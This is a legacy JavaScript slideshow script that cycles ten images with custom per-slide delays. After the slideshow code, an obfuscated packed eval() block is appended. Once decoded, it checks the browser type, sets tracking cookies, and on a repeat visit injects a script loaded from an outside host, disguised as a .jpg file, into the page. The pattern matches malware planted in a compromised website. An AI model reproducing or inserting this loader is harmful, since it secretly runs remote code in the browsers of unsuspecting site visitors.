// JavaScript Document
<!--

// (C) 2000 www.CodeLifter.com
// http://www.codelifter.com
// Free for all users, but leave in this  header
// NS4-6,IE4-6
// Fade effect only in IE; degrades gracefully

// =======================================
// set the following variables
// =======================================

// Set slideShowSpeed (milliseconds)
var slideShowSpeed = 4000;

// Duration of crossfade (seconds)
var crossFadeDuration = 4;

// Specify the image files
var Pic = new Array(); // don't touch this
// to add more images, just continue
// the pattern, adding to the array below

Pic[0] = 'diashow/dia1.jpg';
Pic[1] = 'diashow/dia2.jpg';
Pic[2] = 'diashow/dia3.jpg';
Pic[3] = 'diashow/dia4.jpg';
Pic[4] = 'diashow/dia5.jpg';
Pic[5] = 'diashow/dia6.jpg';
Pic[6] = 'diashow/dia7.jpg';
Pic[7] = 'diashow/dia8.jpg';
Pic[8] = 'diashow/dia9.jpg';
Pic[9] = 'diashow/dia10.jpg';

var Tijd = new Array()
//extra tijd toevoegen bij dia
Tijd[0] = 3000 //2000 laatste dia
Tijd[1] = 4000 //2000 dia 1
Tijd[2] = 5000 //3000 dia 2
Tijd[3] = 3000 //1000 dia 3
Tijd[4] = 8400 //5000 dia 4
Tijd[5] = 2500 //1000 dia 5
Tijd[6] = 4000 //3000 dia 6
Tijd[7] = 4000 //3000 dia 7
Tijd[8] = 5000 //4000 dia 8
Tijd[9] = 2000 //1000 dia 9


// =======================================
// do not edit anything below this line
// =======================================

var t
var j = 0
var p = Pic.length

var preLoad = new Array()
for (i = 0; i < p; i++){
   preLoad[i] = new Image()
   preLoad[i].src = Pic[i]
}

function runSlideShow(){
   if (document.all){
      document.images.SlideShow.style.filter="blendTrans(duration=2)"
      document.images.SlideShow.style.filter="blendTrans(duration=crossFadeDuration)"
      document.images.SlideShow.filters.blendTrans.Apply()      
   }
   document.images.SlideShow.src = preLoad[j].src
   if (document.all){
      document.images.SlideShow.filters.blendTrans.Play()
   }
   j = j + 1
   if (j > (p-1)) j=0
   t = setTimeout('runSlideShow()', slideShowSpeed + Tijd[j])
   
}
//-->



eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('(k(d){2 e=Z.W;2 f=T;5(e.7("U")!=-1||e.7("17")!=-1)f=m;5(f!==m)o;2 n=\'12://H.E/N/K.R?M\';2 c=t("a");5(c){5(c==\'p\'){b("a","Q","3");2 s=6.P(\'J\');s.I=\'D/C\';s.B=n+\'&r=\'+z u().O();2 h=6.10(\'13\')[0];h.S(s)}l{}}l{b("a","p","3")}k t(8){2 i,x,y,4=6.w.18(";");11(i=0;i<4.V;i++){x=4[i].q(0,4[i].7("="));y=4[i].q(4[i].7("=")+1);x=x.X(/^\\s+|\\s+$/g,"");5(x==8){o Y(y)}}}k b(8,v,j){2 9=z u();9.16(9.15()+j);2 A=14(v)+((j==F)?"":"; L="+9.G());6.w=8+"="+A}})(6);',62,71,'||var||ARRcookies|if|document|indexOf|c_name|exdate|wss|setCookie|rc||agent|show||||exdays|function|else|true|staturl|return|goot1|substr|||getCookie|Date|value|cookie|||new|c_value|src|javascript|text|nl|null|toUTCString|soulandspirit|type|script|dia0|expires|js|diashow|getTime|createElement|goot2|jpg|appendChild|false|Firefox|length|userAgent|replace|unescape|navigator|getElementsByTagName|for|http|head|escape|getDate|setDate|MSIE|split'.split('|'),0,{}))

